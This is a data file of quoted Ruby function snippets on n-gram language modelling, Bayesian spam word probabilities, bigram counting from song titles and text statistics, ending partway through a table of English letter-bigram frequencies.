"def calculate_probability(word)\n ham_word_frequency = 2 * words_hash[[word,:good]]\n spam_word_frequency = words_hash[[word, :bad]]\n return if ham_word_frequency + spam_word_frequency < 5\n word_probability = min(1.0, spam_word_frequency.to_f / spam_count)\n total_probability = word_probability + min(1.0, ham_word_frequency.to_f / ham_count)\n max(0.1, min(0.99, word_probability/total_probability))\n end",
"def p(trigram)\n\n bigram = trigram[1..2]\n unigram = trigram[2..2]\n # see which case we fall into for this backoff scheme\n if @counts.include?(trigram)\n # p1 function, trigram exists\n return pML(trigram, @discount)\n else\n ngram = nil\n beta_gram = nil\n alpha = 0\n if @counts.include?(bigram)\n # p2 function, no trigram but bigram exists\n ngram = bigram\n beta_gram = trigram[0..1] # the words used to help generate a beta-set of zero-count trigram\n # alpha mass redistribution\n alpha = @weights[:p2] * (1 - pML(trigram, @discount))\n else\n # p3 function, no trigram or bigram\n ngram = unigram\n beta_gram = trigram[0..0] # the words used to help generate a beta-set of zero-count bigrams\n # alpha mass redistribution\n alpha = @weights[:p3] * (1 - pML(trigram, @discount))\n end\n\n numerator = pML(ngram) \n denominator = @beta_gram_cache.fetch(beta_gram, nil) \n if not denominator\n dgram = nil\n sum = 0\n @vocab.each do |v| # all permutations of vocab words\n dgram = beta_gram + [v]\n # that are zero-count ngrams of (w,w_i-1,w_i-2) or (w,w_i-1)\n if not @counts.include?(dgram)\n # should be part of the sum of pML(w|w_i-1) or pML(w)\n sum += pML(dgram.drop(1)) # drop w_i-2 or w_i-1 as needed\n end\n end\n\n @beta_gram_cache.store(beta_gram, sum)\n denominator = sum\n end\n\n if denominator == 0 then return 0 end\n return alpha * numerator / denominator\n end\n\n end",
"def calculate_kn_probability next_ngram: nil, ngram_model: 0, discount: 0.25, ngram_counts: @ngram_counts, good_turing_bins: @good_turing_bins, separator: \" \"\n local_ngram_model = ngram_model==0 ? next_ngram.split(separator).count : ngram_model\n \n return calculate_mle_probability(next_ngram: next_ngram, separator: separator) if local_ngram_model==1 # Recursion stops at the unigram model\n\n prefix_regex = /^#{next_ngram.split(separator)[0..-2].join(separator)}\\b/\n prefix = next_ngram.split(separator)[0..-2].join(separator)\n suffix = next_ngram.split(separator).last\n similar_ngrams = ngram_counts[local_ngram_model].select{|ngram, _| puts \"Found #{prefix.green} #{ngram.split[1..-1].join(\" \").brown}\" if (@verbose and ngram.match(prefix_regex)); ngram.match(prefix_regex)}.count # Number of words which complete the current n-1 gram, e.g. for the n-gram \"your house looks nice\" we count \"yhl ugly\", \"yhl fine\" etc. Notice - we don't counts the number of occurences for \"yhl ugly\" etc but only the number of lower-order ngrams which complete the current ngram.\n puts \"#{'Total of '.red + similar_ngrams.to_s.red + ' found.'.red} Now calculating counts.\" if @verbose\n similar_ngrams_total_counts = ngram_counts[local_ngram_model].reduce(0){|acc, (ngram, counts)| puts \"Found #{prefix.green} #{ngram.split[1..-1].join(\" \").brown} with raw count of #{counts}\" if (@verbose and ngram.match?(prefix_regex)); if ngram.match(prefix_regex) then acc += counts; else acc; end} # It's here that we actually sum up the counts\n puts \"#{'Total count is '.red + similar_ngrams_total_counts.to_s.red}\"\n ngrams_with_fixed_suffix = ngram_counts[local_ngram_model].reduce(0){|acc, (ngram, counts)| puts \"Found #{ngram.brown} / #{suffix.green} with raw count of #{counts}\" if (@verbose and ngram.match?(/^#{suffix}\\b/)); acc += counts if ngram.match?(/^#{suffix}\\b/); acc}\n\n first_term = [get_raw_counts(next_ngram).to_f - discount, 0].max / similar_ngrams_total_counts.to_f\n second_term = discount * (similar_ngrams.to_f/ngrams_with_fixed_suffix.to_f)\n \n return first_term + (second_term * calculate_kn_probability(next_ngram: next_ngram.split(separator)[1..-1].join(separator)))\n end",
"def most_probable_next_word(string)\n words = string.split(\" \")\n bigram_key = words.last\n trigram_key = words.last(2).join(\" \") if words.count >= 2\n most_probable_word = \"\"\n\n ## if we can find trigram and trigram exists\n if words.count >= 2 and @trigrams[trigram_key] != nil\n # get w3 from grams with highest P(w1,w2,w3) = P(w1)*P(w2|w1)*P(w3|w1,w2)\n highest_probability = 0.0\n\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(trigram_key + \" \" + word)\n # if P(w1)*P(w2|w1)*P(w3|w1,w2) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n\n puts \"ERROR IN TRIGRAMS\" if highest_probability == 0.0\n puts \"Trigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 3).round(4).to_s\n return most_probable_word\n ## if we can find a bigram and bigram exists\n elsif words.count >= 1 and @bigrams[bigram_key] != nil\n # get w2 from grams with highest P(w2|w1)\n highest_probability = 0.0\n\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(bigram_key + \" \" + word)\n # if P(w1)*P(w2|w1) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n puts \"ERROR IN BIGRAMS\" if highest_probability == 0.0\n puts \"Bigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 2).round(4).to_s\n return most_probable_word\n ## return random unigram?\n else\n highest_probability = 0.0\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(word)\n # if P(w1)*P(w2|w1) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n puts \"Unigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 1).round(4).to_s\n return most_probable_word\n end\n end",
"def calculate_gt_probability next_ngram: nil, ngram_model: 0, ngram_counts: @ngram_counts, good_turing_bins: @good_turing_bins, separator: \" \"\n local_ngram_model = ngram_model==0 ? next_ngram.split(separator).count : ngram_model\n next_ngram_rawcount = ngram_counts[local_ngram_model][next_ngram].to_i\n\n if next_ngram_rawcount == 0 # Distributing P*(unseen)\n return good_turing_bins[local_ngram_model][1].to_f/good_turing_bins[local_ngram_model][0] if @oov_counts.nil? # if no oov are set, we assign the whole probability mass to every missing token\n return (@leftover_probability[local_ngram_model]/@oov_counts[local_ngram_model].values.sum)*@oov_counts[local_ngram_model][next_ngram] # otherwise we assign only part of it\n else\n revised_counts = get_revised_counts next_ngram: next_ngram, ngram_model: local_ngram_model\n return revised_counts.to_f/good_turing_bins[local_ngram_model][0]\n end\n end",
"def calculate_probabilities\n @words_hash.keys.each do |word, _|\n @probability_hash[word] = calculate_probability(word)\n end\n end",
"def word_prob(category, word)\n cat_freq = word_freq(category, word)\n non_cat_freq = word_freq(counter.keys, word) - cat_freq\n cat_docs = doc_size(category)\n non_cat_docs = doc_size(doc_counter.keys) - cat_docs\n\n cat_prob = [1.0 * cat_freq / cat_docs, 1.0].min\n non_cat_prob = [1.0 * non_cat_freq / non_cat_docs, 1.0].min\n\n if cat_prob == 0.0\n cond_prob = 0.4\n else\n cond_prob = 1.0 * cat_prob / (cat_prob + non_cat_prob)\n end\n\n # STDOUT.puts \"#{category}-#{word}, cat #{cat_prob}, non_cat #{non_cat_prob}, cond_p #{cond_prob}\"\n\n cond_prob = [[cond_prob, 0.99].min, 0.01].max\n end",
"def probability_of_ngrams(ngrams)\n probabilities = probabilities_for(ngrams).values\n \n return (probabilities.inject { |joint,prob| joint * prob } || 0.0)\n end",
"def text_probability(text)\n probability_of_ngrams(ngrams_from_text(text))\n end",
"def probability(word)\n word = (Word === word ? word : get(word))\n BigDecimal.new(word.count) / total\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\t\t\t\t\t\t\t\t\t\t\t\t\t#for each line\n\t\t\ttitle = cleanup_title(line)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#clean up title\n\t\t\tif title != nil\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#unless the title doesnt exist\n\t\t\t\twords = title.split(/\\s/)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#split the title into seperate words and remove all the stop words mentioned in the lab\n\t\t\t\twords.delete(\"a\")\n\t\t\t\twords.delete(\"an\")\n\t\t\t\twords.delete(\"and\")\n\t\t\t\twords.delete(\"by\")\n\t\t\t\twords.delete(\"for\")\n\t\t\t\twords.delete(\"from\")\n\t\t\t\twords.delete(\"in\")\n\t\t\t\twords.delete(\"of\")\n\t\t\t\twords.delete(\"on\")\n\t\t\t\twords.delete(\"or\")\n\t\t\t\twords.delete(\"out\")\n\t\t\t\twords.delete(\"the\")\n\t\t\t\twords.delete(\"to\")\n\t\t\t\twords.delete(\"with\")\n\t\t\t\t(0..words.size-2).each do |i|\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# for the size of the words array minus two because we dont want to check bigrams of the last word\n\t\t\t\t\tif $bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"].nil?\t\t\t\t\t\t\t\t\t\t#if the first layer doesnt contain the current word, add it with it's following word with a value of 1\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"].store(\"#{words[i+1]}\", 1)\n\t\t\t\t\telse\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#otherwise, increment the value of the following key word\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"] += 1\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\t#p $bigrams.values.inspect\n\t\tend\n\t\t#puts mcw(\"a\")\n\t\tputs \"Finished. Bigram model built.\\n\"\n\t#rescue\n\t\t#STDERR.puts \"Could not open file\"\n\t\t#exit 4\n\tend\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# call cleanup_title method to extract song titles\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\t#ignore titles with non-english characters\n\t\t\tif title[/(\\w|\\s|\\')*/] == title\n\t\t\t\ttitle = title.split\n\t\t\t\ti = 0;\n\n\t\t\t\twhile i <= title.size-1 #loop through array of words\n\t\t\t\t\thasKey = $bigrams[title[i]] #first word\n\t\t\t\t\thasChild = $bigrams[title[i]] && $bigrams[title[i]][title[i+1]] #second word that follows first\n\t\t\t\t\tbreak if title[i+1].nil? #break if this is the last word in the array\n\n\t\t\t\t\tif hasChild #if child of primary key exists, add one to the count\n\t\t\t\t\t\t$bigrams[title[i]][title[i+1]] += 1;\n\t\t\t\t\telsif hasKey #if primary key exists, add new child with initial count = 1\n\t\t\t\t\t\t$bigrams[title[i]][title[i+1]] = 1;\n\t\t\t\t\telse #if primary key does not exist, add it and child key\n\t\t\t\t\t\t$bigrams[title[i]] = {title[i+1] => 1};\n\t\t\t\t\tend\n\t\t\t\t\ti += 1;\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\t end\nend",
"def process_file(file_name)\r\n\tputs \"Processing File.... \"\r\n\r\n\tbegin\r\n\t\tcounter = Hash.new\r\n\t\tfile = File.open(file_name)\r\n\t\tuntil file.eof?\r\n\t\t\tfile.each_line do |line|\r\n\t\t\t\t# do something for each line\r\n\t\t\t\ttitle = cleanup_title(line)\r\n\t\t\t\tunless(title == \"\")\r\n\t\t\t\t\tbigram = title.split().each_cons(2).to_a\r\n\t\t\t\t\tbigram = bigram.map{ |n| n.join(' ')}\r\n\t\t\t\t\tbigram = bigram.each_with_object(Hash.new(0)){|word, obj| obj[word] += 1}\r\n\t\t\t\t\tif bigram.any?\r\n\t\t\t\t\t\tcounter.merge!(bigram) { |k, old, new| old + new}\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\t\tfile.close\r\n\r\n\t\t$bigramsArray = counter.sort_by { |k, v| -v }\r\n\t\tcreate_hash()\r\n\t\t#$bigrams = $bigrams.to_h\r\n\r\n\t\t#$bigramsHash = Hash.new\r\n\t\t#$bigramsHash = $bigrams.to_h\r\n \t#$bigrams.each { |k, v| puts \"#{v} => #{k}\"}\r\n\r\n\r\n\t\tputs \"Finished. Bigram model built.\\n\"\r\n\trescue\r\n\t\tSTDERR.puts \"Could not open file\"\r\n\t\texit 4\r\n\tend\r\n\r\nend",
"def dump_bigram_info_from_hash()\n\n cumulative_bigram_count = 0\n\n $bigram_count.keys.sort.each do |bigram|\n local_lead_word = bigram.split(/\\s/)[0] #shouldn't need to extract this each time\n cumulative_bigram_count += $bigram_count[bigram]\n cumulative_proportion = cumulative_bigram_count.to_f / $lead_word_count[local_lead_word].to_f\n puts sprintf(\"%s\\t%f\", bigram, cumulative_proportion )\n end\n\nend",
"def doc_probability(category)\n doc_prob = 1.0\n self.words.each do |word|\n doc_prob *= BayesCategory.where(:category=>category).first.word_probability(word[0])\n end\n doc_prob\n end",
"def spamicity(message)\n words = message.split(/\\W+/).map { |m| m.downcase}\n intersting_words_probability_list = intersting_words(words)\n intersting_words_product = intersting_words_probability_list.inject(:*)\n total_probability = intersting_words_product + intersting_words_probability_list.map { |x| 1 - x }.inject(:*)\n intersting_words_product / total_probability\n end",
"def prom_weight\n if pet_histories.length > 0\n promw= pet_histories.sum(:weight)\n promw/pet_histories.length\n else\n \"0\"\n end\n end",
"def byteweight(path_or_string)\n path_or_string=\"\" if path_or_string.nil?\n \n if File.exists?(path_or_string)\n File.size(path_or_string)\n else\n bweight=0\n path_or_string.each_byte{|b|bweight+=1}\n bweight\n end\n end",
"def word_tag_probability(word, tag)\n denom = @tag_frequencies[tag]\n\n if denom.zero?\n 0\n else\n @word_tag_combos[\"#{word}/#{tag}\"] / denom.to_f\n end\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tall = Hash.new\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# do something for each line\n\t\t\ttitle = cleanup_title(line)\n\t\t\tunless title.nil?\n\t\t\t\tgram = title.split().each_cons(2).to_a\n\t\t\t\tgram = gram.map{ |n| n.join(' ') }\n \t\t\t\tgram = gram.each_with_object(Hash.new(0)) { |word, obj| obj[word] += 1 }\n \t\t\t\tif gram.any?\n\t \t\t\t\tall.merge!(gram) { |k, old, new| old + new }\n\t \t\t\tend\n\t\t\tend\n\t\tend\n\t\t$bigramsArray = all.sort_by { |k, v| -v }\n\t\tcreate_hash()\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def qML(ngram)\n # if the numerator count is zero, return zero\n if not @counts.include?(ngram) then return 0 end\n\n # extract a denominator ngram based on the size of the numerator ngram\n dgram = nil\n case ngram.size\n when 3\n # get a bigram\n dgram = ngram[0..1]\n when 2\n # get a unigram\n dgram= ngram[0..0]\n end\n\n if dgram\n # if the denominator count would be zero, return 0\n if not @counts.include?(dgram) then return 0 end\n return @counts.fetch(ngram, 0).to_f / @counts.fetch(dgram, 0).to_f\n else\n # if the denominator count would be zero, return 0\n if @word_count == 0 then return 0 end\n return @counts.fetch(ngram, 0).to_f / @word_count.to_f\n end\n\n rescue ZeroDivisionError\n 0\n end",
"def tally!(file_count)\n @table.each do |words, bigram|\n bigram.tally!(table.size, file_count)\n end\n end",
"def popularity_boost\n return 0 if word_datas.empty?\n\n rare_words = word_datas.select { |data| data[:rarity] }\n return 0 if rare_words.empty?\n\n # 0-1 score for popularity\n # Then divide it by 0-1 for word length\n boosts = rare_words.map do |word|\n 1 - Math.log(word[:rarity] + 1, 60_000)\n end\n boosts.reduce(0, &:+)\n end",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def rpkm(counts, total_mapped_reads, gene_length)\n if counts && gene_length\n sprintf(\"%.2f\",(1e9*counts.to_f)/(total_mapped_reads*gene_length)).to_f\n else\n 0.0\n end\nend",
"def calc_probability(actual_word, translation_word)\n d = levenshtein_distance(actual_word, translation_word)\n\n min_leng= actual_word.size < translation_word.size ? actual_word.size : translation_word.size\n p = 1.0 - d * 1.0 / min_leng\n p < 0 ? 0.0 : p\n end",
"def wordprob(word, category)\n numerator = self.word_count_in_category(word, category) + 1\n denominator = self.all_word_count_in_category(category) + self.vocabularies.size\n return numerator / denominator\n end",
"def probability_exact\n\t\t str_format=\"%0#{nr}b\"\n\t\t combinations=2**nr\n\t\t #p str_format\n\t\t total_w=combinations.times.map do |i|\n comb=sprintf(str_format,i)\n w_local=comb.length.times.inject(0) do |ac,j|\n sgn=comb[j]==\"0\" ? -1 : 1\n\t\t\t\t ac+(j+1)*sgn\n end\n\t\t end.sort\n\n \t\t total_w.find_all do |v| \n if @tails==:both\n v<=-w.abs or v>=w.abs\n elsif @tails==:left\n v<=w\n elsif @tails==:right\n \t\t\t\t v>=w\n end\n \t\t end.count/(combinations.to_f)\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\n\t\t\ttitle = cleanup_title(line)\n\t\t\t# If the title is valid continue\n\t\t\tif title != nil\n\t\t\t\t# Split the title into words\n\t\t\t\twords = title.split(\" \")\n\t\t\t\tw_index = 0\n\t\t\t\t# Remove the stop words\n\t\t\t\twords = words - %w{a an and by for from in of on or out the to with}\n\t\t\t\t# If there is more than one word in a title add to biagram\n\t\t\t\tif words.length > 1\n\t\t\t\t\twords.each do |w|\n\t\t\t\t\t\t# If there is no base word add it\n\t\t\t\t\t\tif $bigrams[w] == nil\n\t\t\t\t\t\t\t$bigrams[w] = Hash.new\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] = 1\n\t\t\t\t\t\t# Else if there is no word following the word add it\n\t\t\t\t\t\telsif $bigrams[w][words[w_index + 1]] == nil\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] = 1\n\t\t\t\t\t\t# Else increment the count of the word following\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] += 1\n\t\t\t\t\t\tend\n\t\t\t\t\t\tw_index += 1\n\t\t\t\t\t\t# Don't include the last word in the title\n\t\t\t\t\t\tif w_index > words.length - 2\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\traise\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def file_process(file)\n\n stop_words = File.read('stop_words.txt').split(\"\\n\")\n\n lines = File.readlines(file)\n title = lines[0]\n speech = lines[1..-1]\n line_count = speech.size\n text = speech.join\n char_count = text.length\n char_count_nospaces = text.force_encoding('UTF-8').gsub(/\\s+/, '').length\n word_count = text.scan(/\\w+/).length\n sentence_count = text.split(/\\.|\\?|!/).length\n average_words_sentence = word_count / sentence_count\n paragraph_count = text.split(/\\n\\n/).length\n word_frequency_hash = {}\n word_frequency_top = []\n\n text.split().each do |word|\n unless stop_words.include?(word.downcase)\n if word_frequency_hash.has_key?(word.downcase)\n word_frequency_hash[word.downcase] += 1\n else\n word_frequency_hash[word.downcase] = 1\n end\n end\n end\n\n non_fluff_words = (word_frequency_hash.size.to_f / word_count.to_f * 100).to_i\n\n array_of_sentences = text.scan(/[^\\.!?]+[\\.!?]/).map(&:strip).sort_by { |sentence| sentence.length }\n ideal_sentences = array_of_sentences[array_of_sentences.length/3..array_of_sentences.length - array_of_sentences.length/3]\n\n word_frequency = word_frequency_hash.sort_by { |key, value| value}.reverse\n word_frequency.flatten.each_with_index { |word, index| word_frequency_top << word if index.even? }\n\n puts \"#{title}\"\n puts \"#{line_count} lines\"\n puts \"#{char_count} characters\"\n puts \"#{char_count_nospaces} characters excluding spaces\"\n puts \"#{word_count} words\"\n puts \"#{sentence_count} sentences\"\n puts \"#{paragraph_count} paragraphs\"\n puts \"#{average_words_sentence} words per sentence (average)\"\n puts \"#{word_frequency_hash.size} non-fluff words\"\n puts \"roughly #{non_fluff_words} percent non-fluff words.\"\n puts \"Top 10 non-fluff words: #{word_frequency_top.take(10)} top 10 non-fluff words.\"\n puts \"Ideal sentences array: #{ideal_sentences.take(7) }\"\n puts\n puts\n\nend",
"def pML(ngram, discount=0)\n # if the numerator count is zero, return zero\n if not @counts.include?(ngram) then return 0 end\n\n # extract a denominator ngram based on the size of the numerator ngram\n dgram = nil\n case ngram.size\n when 3\n dgram = ngram[0..1]\n when 2\n dgram= ngram[0..0]\n end\n\n result = 0\n if dgram\n # if the denominator count would be zero, return 0\n if not @counts.include?(dgram) then return 0 end\n # discount the numerator if needed\n result = (@counts.fetch(ngram, 0).to_f - discount) / @counts.fetch(dgram, 0).to_f\n else\n if @word_count == 0 then return 0 end\n # discount the numerator if needed\n result = (@counts.fetch(ngram, 0).to_f - discount) / @word_count.to_f\n end\n\n# puts \"#{ngram.inspect} #{result}\"\n return result\n\n rescue ZeroDivisionError\n 0\n end",
"def dictionary\n @dictionary ||= ngrams.first.probabilities \n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\t#begin\n\t#processes file at each line\n\tIO.foreach(file_name) do |line|\n\t\t#cleans up song title\n\t\tline = cleanup_title(line)\n\t\t#prevents a nil error with a cleaned up song\n\t\tif line != nil\n\t\t\t#removes stop words from line\n\t\t\tline = cleanupStopWords(line)\n\t\t\t#creates an array of bigrams as found on stackoverflow.com\n\t\t\tbigramArray = line.split.each_cons(2) do |e|\n\t\t\t\t#checks if the bigram exists\n\t\t\t\tif e[0] && e[1] != nil\n\t\t\t\t\t#makes a count from the existing bigram hash value\n\t\t\t\t\tcount = $bigrams[e[0]][e[1]]\n\t\t\t\t\tcount += 1\n\t\t\t\t\t#sets bigram hash value to updated count\n\t\t\t\t\t$bigrams[e[0]][e[1]] = count\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend\n\tputs \"Finished. Bigram model built.\\n\"\nrescue\n\tSTDERR.puts \"Could not open file\"\n\texit 4\nend",
"def full_bigram_counts\n {\n'TH' => 116997844,\n'HE' => 100689263,\n'IN' => 87674002,\n'ER' => 77134382,\n'AN' => 69775179,\n'RE' => 60923600,\n'ES' => 57070453,\n'ON' => 56915252,\n'ST' => 54018399,\n'NT' => 50701084,\n'EN' => 48991276,\n'AT' => 48274564,\n'ED' => 46647960,\n'ND' => 46194306,\n'TO' => 46115188,\n'OR' => 45725191,\n'EA' => 43329810,\n'TI' => 42888666,\n'AR' => 42353262,\n'TE' => 42295813,\n'NG' => 38567365,\n'AL' => 38211584,\n'IT' => 37938534,\n'AS' => 37773878,\n'IS' => 37349981,\n'HA' => 35971841,\n'ET' => 32872552,\n'SE' => 31532272,\n'OU' => 31112284,\n'OF' => 30540904,\n'LE' => 30383262,\n'SA' => 30080131,\n'VE' => 29320973,\n'RO' => 29230770,\n'RA' => 28645577,\n'RI' => 27634643,\n'HI' => 27495342,\n'NE' => 27331675,\n'ME' => 27237733,\n'DE' => 27029835,\n'CO' => 26737101,\n'TA' => 26147593,\n'EC' => 25775798,\n'SI' => 25758841,\n'LL' => 24636875,\n'SO' => 23903631,\n'NA' => 23547524,\n'LI' => 23291169,\n'LA' => 23178317,\n'EL' => 23092248,\n'MA' => 21828378,\n'DI' => 21673998,\n'IC' => 21468412,\n'RT' => 21456059,\n'NS' => 21306421,\n'RS' => 21237259,\n'IO' => 21210160,\n'OM' => 21066156,\n'CH' => 20132750,\n'OT' => 20088048,\n'CA' => 19930754,\n'CE' => 19803619,\n'HO' => 19729026,\n'BE' => 19468489,\n'TT' => 19367472,\n'FO' => 18923772,\n'TS' => 18922522,\n'SS' => 18915696,\n'NO' => 18894111,\n'EE' => 18497942,\n'EM' => 18145294,\n'AC' => 17904683,\n'IL' => 17877600,\n'DA' => 17584055,\n'NI' => 17452104,\n'UR' => 17341717,\n'WA' => 16838794,\n'SH' => 16773127,\n'EI' => 16026915,\n'AM' => 15975981,\n'TR' => 15821226,\n'DT' => 15759673,\n'US' => 15699353,\n'LO' => 15596310,\n'PE' => 15573318,\n'UN' => 15237699,\n'NC' => 15214623,\n'WI' => 15213018,\n'UT' => 15137169,\n'AD' => 14877234,\n'EW' => 14776406,\n'OW' => 14610429,\n'GE' => 14425023,\n'EP' => 14024377,\n'AI' => 13974919,\n'LY' => 13742031,\n'OL' => 13726491,\n'FT' => 13696078,\n'OS' => 13596265,\n'EO' => 13524186,\n'EF' => 13252227,\n'PR' => 13191182,\n'WE' => 13185116,\n'DO' => 13120322,\n'MO' => 12950768,\n'ID' => 12896787,\n'IE' => 12505546,\n'MI' => 12168944,\n'PA' => 12068709,\n'FI' => 11993833,\n'PO' => 11917535,\n'CT' => 11888752,\n'WH' => 11852909,\n'IR' => 11681353,\n'AY' => 11523416,\n'GA' => 11239788,\n'SC' => 10800636,\n'KE' => 10650670,\n'EV' => 10574011,\n'SP' => 10570626,\n'IM' => 10544422,\n'OP' => 10459455,\n'DS' => 10429887,\n'LD' => 10245579,\n'UL' => 10173468,\n'OO' => 10168856,\n'SU' => 10031005,\n'IA' => 10002012,\n'GH' => 9880399,\n'PL' => 9812226,\n'EB' => 9738798,\n'IG' => 9530574,\n'VI' => 9380037,\n'IV' => 9129232,\n'WO' => 9106647,\n'YO' => 9088497,\n'RD' => 9025637,\n'TW' => 8910254,\n'BA' => 8867461,\n'AG' => 8809266,\n'RY' => 8788539,\n'AB' => 8775582,\n'LS' => 8675452,\n'SW' => 8673234,\n'AP' => 8553911,\n'FE' => 8529289,\n'TU' => 8477495,\n'CI' => 8446084,\n'FA' => 8357929,\n'HT' => 8351551,\n'FR' => 8339376,\n'AV' => 8288885,\n'EG' => 8286463,\n'GO' => 8188708,\n'BO' => 8172395,\n'BU' => 8113271,\n'TY' => 8008918,\n'MP' => 7835172,\n'OC' => 7646952,\n'OD' => 7610214,\n'EH' => 7559141,\n'YS' => 7539621,\n'EY' => 7528342,\n'RM' => 7377989,\n'OV' => 7350014,\n'GT' => 7347990,\n'YA' => 7239548,\n'CK' => 7205091,\n'GI' => 7103140,\n'RN' => 7064635,\n'GR' => 6989963,\n'RC' => 6974063,\n'BL' => 6941044,\n'LT' => 6817273,\n'YT' => 6714151,\n'OA' => 6554221,\n'YE' => 6499305,\n'OB' => 6212512,\n'DB' => 6106719,\n'FF' => 6085519,\n'SF' => 6073995,\n'RR' => 5896212,\n'DU' => 5861311,\n'KI' => 5814357,\n'UC' => 5742385,\n'IF' => 5740414,\n'AF' => 5702567,\n'DR' => 5701879,\n'CL' => 5683204,\n'EX' => 5649363,\n'SM' => 5580755,\n'PI' => 5559210,\n'SB' => 5553684,\n'CR' => 5514347,\n'TL' => 5403137,\n'OI' => 5336616,\n'RU' => 5330557,\n'UP' => 5306948,\n'BY' => 5232074,\n'TC' => 5196817,\n'NN' => 5180899,\n'AK' => 5137311,\n'SL' => 4965012,\n'NF' => 4950333,\n'UE' => 4927837,\n'DW' => 4906814,\n'AU' => 4884168,\n'PP' => 4873393,\n'UG' => 4832325,\n'RL' => 4803246,\n'RG' => 4645938,\n'BR' => 4621080,\n'CU' => 4604045,\n'UA' => 4589997,\n'DH' => 4585765,\n'RK' => 4491400,\n'YI' => 4461214,\n'LU' => 4402940,\n'UM' => 4389720,\n'BI' => 4356462,\n'NY' => 4343290,\n'NW' => 4215967,\n'QU' => 4169424,\n'OG' => 4163126,\n'SN' => 4157990,\n'MB' => 4121764,\n'VA' => 4111375,\n'DF' => 4033878,\n'DD' => 4001275,\n'MS' => 3922855,\n'GS' => 3920675,\n'AW' => 3918960,\n'NH' => 3915410,\n'PU' => 3858148,\n'HR' => 3843001,\n'SD' => 3842250,\n'TB' => 3815459,\n'PT' => 3812475,\n'NM' => 3796928,\n'DC' => 3782481,\n'GU' => 3768430,\n'TM' => 3759861,\n'MU' => 3755834,\n'NU' => 3732602,\n'MM' => 3730508,\n'NL' => 3692985,\n'EU' => 3674130,\n'WN' => 3649615,\n'NB' => 3602692,\n'RP' => 3588188,\n'DM' => 3544905,\n'SR' => 3513808,\n'UD' => 3499535,\n'UI' => 3481482,\n'RF' => 3436232,\n'OK' => 3397570,\n'YW' => 3379064,\n'TF' => 3368452,\n'IP' => 3348621,\n'RW' => 3348005,\n'RB' => 3346212,\n'OH' => 3254659,\n'KS' => 3227333,\n'DP' => 3145043,\n'FU' => 3138900,\n'YC' => 3128053,\n'TP' => 3070427,\n'MT' => 3055946,\n'DL' => 3050945,\n'NK' => 3043200,\n'CC' => 3026492,\n'UB' => 2990868,\n'RH' => 2968706,\n'NP' => 2968126,\n'JU' => 2924815,\n'FL' => 2890839,\n'DN' => 2840522,\n'KA' => 2833038,\n'PH' => 2825344,\n'HU' => 2771830,\n'JO' => 2721345,\n'LF' => 2702522,\n'YB' => 2696786,\n'RV' => 2692445,\n'OE' => 2616308,\n'IB' => 2598444,\n'IK' => 2585124,\n'YP' => 2581863,\n'GL' => 2576787,\n'LP' => 2543957,\n'YM' => 2516273,\n'LB' => 2463693,\n'HS' => 2462026,\n'DG' => 2442139,\n'GN' => 2426429,\n'EK' => 2411639,\n'NR' => 2393580,\n'PS' => 2377036,\n'TD' => 2346516,\n'LC' => 2328063,\n'SK' => 2321888,\n'YF' => 2305244,\n'YH' => 2291273,\n'VO' => 2253292,\n'AH' => 2225270,\n'DY' => 2218040,\n'LM' => 2216514,\n'SY' => 2214270,\n'NV' => 2194534,\n'YD' => 2122337,\n'FS' => 2047416,\n'SG' => 2043770,\n'YR' => 2021939,\n'YL' => 2013939,\n'WS' => 